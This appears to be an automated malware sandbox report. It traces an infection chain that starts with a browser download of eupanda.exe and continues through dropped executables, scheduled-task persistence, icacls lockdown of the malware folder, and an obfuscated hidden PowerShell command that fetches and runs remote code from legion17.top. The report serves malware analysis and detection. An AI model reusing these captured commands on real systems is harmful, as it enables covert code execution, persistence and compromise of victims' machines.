4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
3364	wship6.exe
3364	wship6.exe
3364	wship6.exe
3364	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
2496	wship6.exe
2496	wship6.exe
2496	wship6.exe
2496	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4612	wship6.exe
4612	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4612	wship6.exe
4612	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeRestorePrivilege	3736	WerFault.exe
Token: SeBackupPrivilege	3736	WerFault.exe
Token: SeDebugPrivilege	3736	WerFault.exe
Token: SeDebugPrivilege	2144	WerFault.exe
Token: SeDebugPrivilege	5044	taskkill.exe
Token: SeDebugPrivilege	4880	WerFault.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4932	iexplore.exe
4932	iexplore.exe
4932	iexplore.exe
4436	eupanda.tmp

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4932	iexplore.exe
4932	iexplore.exe
4980	IEXPLORE.EXE
4980	IEXPLORE.EXE
3712	slhost2.exe

Suspicious use of WriteProcessMemory 118 IoCs

description	pid	Process	procid_target
PID 4932 wrote to memory of 4980	4932	iexplore.exe	72
PID 4932 wrote to memory of 4980	4932	iexplore.exe	72
PID 4932 wrote to memory of 4980	4932	iexplore.exe	72
PID 2044 wrote to memory of 1848	2044	SppExtComObj.exe	76
PID 2044 wrote to memory of 1848	2044	SppExtComObj.exe	76
PID 4932 wrote to memory of 3940	4932	iexplore.exe	78
PID 4932 wrote to memory of 3940	4932	iexplore.exe	78
PID 4932 wrote to memory of 3940	4932	iexplore.exe	78
PID 3964 wrote to memory of 3940	3964	svchost.exe	78
PID 3940 wrote to memory of 4436	3940	eupanda.exe	80
PID 3940 wrote to memory of 4436	3940	eupanda.exe	80
PID 3940 wrote to memory of 4436	3940	eupanda.exe	80
PID 4436 wrote to memory of 4644	4436	eupanda.tmp	82
PID 4436 wrote to memory of 4644	4436	eupanda.tmp	82
PID 4436 wrote to memory of 4644	4436	eupanda.tmp	82
PID 4644 wrote to memory of 3712	4644	postback.EXE	83
PID 4644 wrote to memory of 3712	4644	postback.EXE	83
PID 4644 wrote to memory of 3712	4644	postback.EXE	83
PID 4644 wrote to memory of 4736	4644	postback.EXE	84
PID 4644 wrote to memory of 4736	4644	postback.EXE	84
PID 4644 wrote to memory of 4736	4644	postback.EXE	84
PID 4736 wrote to memory of 3680	4736	cmd.exe	86
PID 4736 wrote to memory of 3680	4736	cmd.exe	86
PID 4736 wrote to memory of 3680	4736	cmd.exe	86
PID 4240 wrote to memory of 3736	4240	svchost.exe	88
PID 4240 wrote to memory of 3736	4240	svchost.exe	88
PID 4240 wrote to memory of 3736	4240	svchost.exe	88
PID 3712 wrote to memory of 1672	3712	slhost2.exe	91
PID 3712 wrote to memory of 1672	3712	slhost2.exe	91
PID 3712 wrote to memory of 1672	3712	slhost2.exe	91
PID 1672 wrote to memory of 1968	1672	slhost2.exe	93
PID 1672 wrote to memory of 1968	1672	slhost2.exe	93
PID 1672 wrote to memory of 1968	1672	slhost2.exe	93
PID 4240 wrote to memory of 2144	4240	svchost.exe	94
PID 4240 wrote to memory of 2144	4240	svchost.exe	94
PID 4240 wrote to memory of 2144	4240	svchost.exe	94
PID 1672 wrote to memory of 2436	1672	slhost2.exe	95
PID 1672 wrote to memory of 2436	1672	slhost2.exe	95
PID 1672 wrote to memory of 2436	1672	slhost2.exe	95
PID 1672 wrote to memory of 2448	1672	slhost2.exe	96
PID 1672 wrote to memory of 2448	1672	slhost2.exe	96
PID 1672 wrote to memory of 2448	1672	slhost2.exe	96
PID 2448 wrote to memory of 5044	2448	cmd.exe	98
PID 2448 wrote to memory of 5044	2448	cmd.exe	98
PID 2448 wrote to memory of 5044	2448	cmd.exe	98
PID 2436 wrote to memory of 1804	2436	FX073BL9N1.exe	99
PID 2436 wrote to memory of 1804	2436	FX073BL9N1.exe	99
PID 2436 wrote to memory of 1804	2436	FX073BL9N1.exe	99
PID 1804 wrote to memory of 1972	1804	dll.exe	103
PID 1804 wrote to memory of 1972	1804	dll.exe	103
PID 1804 wrote to memory of 1972	1804	dll.exe	103
PID 1804 wrote to memory of 2188	1804	dll.exe	105
PID 1804 wrote to memory of 2188	1804	dll.exe	105
PID 1804 wrote to memory of 2188	1804	dll.exe	105
PID 1804 wrote to memory of 2400	1804	dll.exe	106
PID 1804 wrote to memory of 2400	1804	dll.exe	106
PID 1804 wrote to memory of 2400	1804	dll.exe	106
PID 1804 wrote to memory of 4292	1804	dll.exe	108
PID 1804 wrote to memory of 4292	1804	dll.exe	108
PID 1804 wrote to memory of 4292	1804	dll.exe	108
PID 1804 wrote to memory of 992	1804	dll.exe	109
PID 1804 wrote to memory of 992	1804	dll.exe	109
PID 1804 wrote to memory of 992	1804	dll.exe	109
PID 1804 wrote to memory of 1476	1804	dll.exe	110
PID 1804 wrote to memory of 1476	1804	dll.exe	110
PID 1804 wrote to memory of 1476	1804	dll.exe	110
PID 1804 wrote to memory of 5116	1804	dll.exe	115
PID 1804 wrote to memory of 5116	1804	dll.exe	115
PID 1804 wrote to memory of 5116	1804	dll.exe	115
PID 1972 wrote to memory of 4972	1972	cmd.exe	116
PID 1972 wrote to memory of 4972	1972	cmd.exe	116
PID 1972 wrote to memory of 4972	1972	cmd.exe	116
PID 2400 wrote to memory of 5016	2400	cmd.exe	117
PID 2400 wrote to memory of 5016	2400	cmd.exe	117
PID 2400 wrote to memory of 5016	2400	cmd.exe	117
PID 2188 wrote to memory of 5044	2188	cmd.exe	118
PID 2188 wrote to memory of 5044	2188	cmd.exe	118
PID 2188 wrote to memory of 5044	2188	cmd.exe	118
PID 992 wrote to memory of 2488	992	cmd.exe	120
PID 992 wrote to memory of 2488	992	cmd.exe	120
PID 992 wrote to memory of 2488	992	cmd.exe	120
PID 1476 wrote to memory of 4964	1476	cmd.exe	119
PID 1476 wrote to memory of 4964	1476	cmd.exe	119
PID 1476 wrote to memory of 4964	1476	cmd.exe	119
PID 4292 wrote to memory of 2608	4292	cmd.exe	121
PID 4292 wrote to memory of 2608	4292	cmd.exe	121
PID 4292 wrote to memory of 2608	4292	cmd.exe	121
PID 4576 wrote to memory of 3400	4576	ir50_qcxoriginal.exe	128
PID 4576 wrote to memory of 3400	4576	ir50_qcxoriginal.exe	128
PID 4576 wrote to memory of 4528	4576	ir50_qcxoriginal.exe	130
PID 4576 wrote to memory of 4528	4576	ir50_qcxoriginal.exe	130
PID 4576 wrote to memory of 816	4576	ir50_qcxoriginal.exe	132
PID 4576 wrote to memory of 816	4576	ir50_qcxoriginal.exe	132
PID 4576 wrote to memory of 912	4576	ir50_qcxoriginal.exe	134
PID 4576 wrote to memory of 912	4576	ir50_qcxoriginal.exe	134
PID 4576 wrote to memory of 1880	4576	ir50_qcxoriginal.exe	136
PID 4576 wrote to memory of 1880	4576	ir50_qcxoriginal.exe	136
PID 4576 wrote to memory of 4352	4576	ir50_qcxoriginal.exe	138
PID 4576 wrote to memory of 4352	4576	ir50_qcxoriginal.exe	138
PID 4576 wrote to memory of 5012	4576	ir50_qcxoriginal.exe	140
PID 4576 wrote to memory of 5012	4576	ir50_qcxoriginal.exe	140
PID 4576 wrote to memory of 5016	4576	ir50_qcxoriginal.exe	142
PID 4576 wrote to memory of 5016	4576	ir50_qcxoriginal.exe	142
PID 4240 wrote to memory of 4880	4240	svchost.exe	144
PID 4240 wrote to memory of 4880	4240	svchost.exe	144
PID 4240 wrote to memory of 4880	4240	svchost.exe	144
PID 4576 wrote to memory of 320	4576	ir50_qcxoriginal.exe	145
PID 4576 wrote to memory of 320	4576	ir50_qcxoriginal.exe	145
PID 4576 wrote to memory of 4252	4576	ir50_qcxoriginal.exe	147
PID 4576 wrote to memory of 4252	4576	ir50_qcxoriginal.exe	147
PID 4576 wrote to memory of 3364	4576	ir50_qcxoriginal.exe	149
PID 4576 wrote to memory of 3364	4576	ir50_qcxoriginal.exe	149
PID 4576 wrote to memory of 2496	4576	ir50_qcxoriginal.exe	151
PID 4576 wrote to memory of 2496	4576	ir50_qcxoriginal.exe	151
PID 4576 wrote to memory of 4612	4576	ir50_qcxoriginal.exe	154
PID 4576 wrote to memory of 4612	4576	ir50_qcxoriginal.exe	154
PID 4576 wrote to memory of 2684	4576	ir50_qcxoriginal.exe	156
PID 4576 wrote to memory of 2684	4576	ir50_qcxoriginal.exe	156

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://mynevainstall.org/eupanda.exe
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4932
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4932 CREDAT:82945 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4980
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\eupanda.exe
  "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\eupanda.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3940
- - C:\Users\Admin\AppData\Local\Temp\is-DS0V7.tmp\eupanda.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-DS0V7.tmp\eupanda.tmp" /SL5="$40146,8491859,56832,C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\eupanda.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\postback.EXE
      "C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\postback.EXE" waggle waggle
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4644
    - - C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3712
      - C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Checks processor information in registry
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1672
        
        C:\ProgramData\E9BZLP6Q0N.exe
        
        "C:\ProgramData\E9BZLP6Q0N.exe"
        7⤵
        Executes dropped EXE
        
        PID:1968
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 584
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
        
        C:\ProgramData\FX073BL9N1.exe
        
        "C:\ProgramData\FX073BL9N1.exe"
        7⤵
        Executes dropped EXE
        NTFS ADS
        Suspicious use of WriteProcessMemory
        
        PID:2436
        
        C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\dll.exe
        
        C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\dll.exe
        8⤵
        Executes dropped EXE
        Adds Run key to start application
        NTFS ADS
        Suspicious use of WriteProcessMemory
        
        PID:1804
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {VLUVX5IB-VH3O-V55H-LS2K-LOBMHNF2I1F7} /tr C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
        9⤵
        
        PID:1972
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn {VLUVX5IB-VH3O-V55H-LS2K-LOBMHNF2I1F7} /tr C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
        10⤵
        Creates scheduled task(s)
        
        PID:4972
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
        9⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
        10⤵
        Modifies file permissions
        
        PID:5044
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
        9⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
        10⤵
        Modifies file permissions
        
        PID:5016
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
        9⤵
        
        PID:4292
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
        10⤵
        Modifies file permissions
        
        PID:2608
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
        9⤵
        
        PID:992
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
        10⤵
        Modifies file permissions
        
        PID:2488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
        9⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
        10⤵
        Modifies file permissions
        
        PID:4964
        
        C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe
        
        "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe"
        9⤵
        Executes dropped EXE
        
        PID:5116
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 944
        10⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:4880
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im slhost2.exe /f & erase C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2448
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im slhost2.exe /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5044
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex#@(n#ew###-#ob#jec#t N#######################################################################et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.top/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4736
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex#@(n#ew###-#ob#jec#t N#######################################################################et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.top/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        6⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 692
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3736

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Windows\System32\SLUI.exe
  "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
  2⤵
  PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4240

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
1⤵
PID:4088

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:3524

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wisvc
1⤵
PID:3032

C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\ir50_qcxoriginal.exe
C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\ir50_qcxoriginal.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4576
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:3400
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:4528
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:816
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:912
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:1880
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:4352
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:5012
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:5016
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:320
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:4252
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:3364
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:2496
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:4612
- C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
  2⤵
  - Executes dropped EXE
  PID:2684

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Modifies service
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1332

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
- Modifies service
PID:1652

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
1⤵
PID:2552

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
1⤵
PID:4828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
1⤵
- Modifies service
PID:1188

C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\ir50_qcxoriginal.exe
C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\ir50_qcxoriginal.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4652

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1804-234-0x0000000003467000-0x0000000003468000-memory.dmp

Filesize
4KB

Download
memory/1804-235-0x0000000003900000-0x0000000003901000-memory.dmp

Filesize
4KB

Download
memory/2144-205-0x0000000003200000-0x0000000003201000-memory.dmp

Filesize
4KB

Download
memory/2144-186-0x0000000003200000-0x0000000003201000-memory.dmp

Filesize
4KB

Download
memory/2144-199-0x0000000003200000-0x0000000003201000-memory.dmp

Filesize
4KB

Download
memory/2144-200-0x0000000003200000-0x0000000003201000-memory.dmp

Filesize
4KB

Download
memory/2144-201-0x0000000003200000-0x0000000003201000-memory.dmp

Filesize
4KB

Download
